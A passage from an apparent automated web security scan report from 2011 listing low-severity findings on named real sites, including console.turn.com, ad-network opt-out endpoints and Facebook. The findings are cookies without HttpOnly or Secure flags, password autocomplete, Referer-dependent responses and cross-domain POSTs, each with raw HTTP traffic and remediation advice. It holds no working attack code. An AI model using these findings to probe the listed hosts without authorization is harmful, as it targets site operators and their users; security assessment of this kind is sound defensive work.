6.66. http://www.adexchanger.com/the-state-of/turn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adexchanger.com
Path:   /the-state-of/turn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-state-of/turn/ HTTP/1.1
Host: www.adexchanger.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2011 18:55:39 GMT
X-Pingback: http://www.adexchanger.com/xmlrpc.php
Link: <http://www.adexchanger.com/?p=44443>; rel=shortlink
Connection: close
Set-Cookie: X-Mapping-hmcbjmko=5DDB411F987FCC902EF5C0C8C2D36FC1; path=/
Content-Length: 49835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

6.67. http://www.bizographics.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout?nocache=0.2636576 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 13 Nov 2011 18:53:43 GMT
Location: http://www.bizographics.com/nai/checkoptout
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/1.0.4
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 13-Nov-2011 18:53:44 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 11-Nov-2016 18:53:43 GMT; Path=/
Content-Length: 0
Connection: keep-alive


6.68. http://www.burstnet.com/cgi-bin/opt_out.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/opt_out.cgi?nocache=0.2463401 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: /cgi-bin/opt_out_verify.cgi
Content-Type: text/plain
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:42 GMT
Connection: close
Set-Cookie: CMS=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: CMP=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: TData=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: TID=1; domain=.burstnet.com; path=/; expires=Mon, 15-Aug-2011 18:53:42 GMT
Set-Cookie: BOO=opt-out; domain=.burstnet.com; path=/; expires=Fri, 11-Nov-2016 18:53:42 GMT


6.69. http://www.facebook.com/TurnInc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TurnInc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TurnInc HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: datr=qBLATucyC1LUOzkQJKGOGIHR; expires=Tue, 12-Nov-2013 18:55:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FTurnInc; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FTurnInc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.202.220
Connection: close
Date: Sun, 13 Nov 2011 18:55:36 GMT
Content-Length: 200859

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://ogp.me/ns#" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...

6.70. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout_pure.php?cookie_test=true HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex; svid=OPT-OUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 13 Nov 2011 18:54:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Nov 2011 18:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Nov 2011 18:54:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mojo1=deleted; expires=Sat, 13-Nov-2010 18:54:20 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo2=deleted; expires=Sat, 13-Nov-2010 18:54:20 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo3=deleted; expires=Sat, 13-Nov-2010 18:54:20 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

6.71. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_pure.php?nocache=0.9027664 HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 13 Nov 2011 18:54:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: /optout_pure.php?cookie_test=true
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Nov 2011 18:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Nov 2011 18:54:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: svid=OPT-OUT; expires=Wed, 10-Nov-2021 18:54:19 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

6.72. http://www.nexac.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai_optout.php?nocache=0.5815065 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml",CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo IVAa IVDa HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=ignore; expires=Fri, 21-Apr-2028 18:53:44 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Location: http://www.nexac.com/nai_verify.php
Content-type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:44 GMT
Server: lighttpd/1.4.18


7. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. https://console.turn.com/app/account/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://console.turn.com
Path:   /app/account/index.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /app/account/index.htm HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Content-Length: 70
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/login.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

loginPage=true&accountName=xss&accountPassword=xss&btnlogin=Log+In+%3E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:33 GMT
Content-Length: 5474


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<!-- start login form -->
                                                                       <form name=f action='/app/account/index.htm?' method=post>        

           <input type="hidden" name="loginPage" value="true">
...[SNIP]...
</label>
                   <input type="password" name="accountPassword" id="accountPassword" value="" maxlength="32" class="fTxt" />
               </div>
...[SNIP]...

7.2. https://console.turn.com/login/login.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://console.turn.com
Path:   /login/login.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/login.htm HTTP/1.1
Host: console.turn.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.turn.com/?page_id=542
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:51:48 GMT
Content-Length: 4828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
<!-- start login form -->
                                                           <form name=f action='https://console.turn.com/app/account/index.htm' method=post>        

           <input type="hidden" name="loginPage" value="true">
...[SNIP]...
</label>
                   <input type="password" name="accountPassword" id="accountPassword" value="" maxlength="32" class="fTxt" />
               </div>
...[SNIP]...

7.3. http://www.facebook.com/TurnInc  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TurnInc

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /TurnInc HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: datr=qBLATucyC1LUOzkQJKGOGIHR; expires=Tue, 12-Nov-2013 18:55:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FTurnInc; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FTurnInc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.202.220
Connection: close
Date: Sun, 13 Nov 2011 18:55:36 GMT
Content-Length: 200859

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://ogp.me/ns#" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

8. Referer-dependent response  previous  next
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



8.1. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ats.tumri.net
Path:   /ats/optout

Request 1

GET /ats/optout?nai=true&id=1936234986&nocache=0.7506367 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=15363377|-917800724

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Nov 13 18:53:44 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Fri, 01-Dec-2079 22:07:51 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.7506367&tu=1
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:44 GMT
Connection: close

Request 2

GET /ats/optout?nai=true&id=1936234986&nocache=0.7506367 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=15363377|-917800724

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://www.tumri.com/privacy/status-failure.jpg
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:46 GMT
Connection: close


8.2. http://optout.collective-media.net/optout/status  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://optout.collective-media.net
Path:   /optout/status

Request 1

GET /optout/status?nocache=0.9640335 HTTP/1.1
Host: optout.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Sun, 13 Nov 2011 18:51:52 GMT
Content-Type: text/html
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0

Request 2

GET /optout/status?nocache=0.9640335 HTTP/1.1
Host: optout.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response 2

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

9. Cross-domain POST  previous  next
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://flex.madebymufffin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flex.madebymufffin.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: flex.madebymufffin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:57:37 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4
Last-Modified: Thu, 27 Oct 2011 07:35:31 GMT
Accept-Ranges: none
Vary: Accept-Encoding
Cache-Control: max-age=0, public
Expires: Sun, 13 Nov 2011 18:57:37 GMT
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 41340
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   <title>FlexSlider - The Best Responsive jQuery Slider</title>
   <meta name="d
...[SNIP]...
<div class="flattr-clearfix">
<form style="width: 92px; height: 32px; margin: 0; float: left;" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

9.2. http://gsgd.co.uk/sandbox/jquery/easing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsgd.co.uk
Path:   /sandbox/jquery/easing/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sandbox/jquery/easing/ HTTP/1.1
Host: gsgd.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:57:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p>
...[SNIP]...

9.3. http://www.adexchanger.com/the-state-of/turn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adexchanger.com
Path:   /the-state-of/turn/

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /the-state-of/turn/ HTTP/1.1
Host: www.adexchanger.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2011 18:55:39 GMT
X-Pingback: http://www.adexchanger.com/xmlrpc.php
Link: <http://www.adexchanger.com/?p=44443>; rel=shortlink
Connection: close
Set-Cookie: X-Mapping-hmcbjmko=5DDB411F987FCC902EF5C0C8C2D36FC1; path=/
Content-Length: 49835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<div align="center">
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<table>
...[SNIP]...

9.4. http://www.adexchanger.com/the-state-of/turn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adexchanger.com
Path:   /the-state-of/turn/

Issue detail

The page contains a form which POSTs data to the domain visitor.constantcontact.com. The form contains the following fields:

Request

GET /the-state-of/turn/ HTTP/1.1
Host: www.adexchanger.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2011 18:55:39 GMT
X-Pingback: http://www.adexchanger.com/xmlrpc.php
Link: <http://www.adexchanger.com/?p=44443>; rel=shortlink
Connection: close
Set-Cookie: X-Mapping-hmcbjmko=5DDB411F987FCC902EF5C0C8C2D36FC1; path=/
Content-Length: 49835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<div align="center">
<form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<table>
...[SNIP]...

10. SSL cookie without secure flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.turn.com
Path:   /include/formAction.htm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

POST /include/formAction.htm HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Content-Length: 91
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/forgotPassword.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

actionControler=ForgotPassword&GUID=3333672997611656568&emailAddress=weedw&btnSubmit=Submit

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
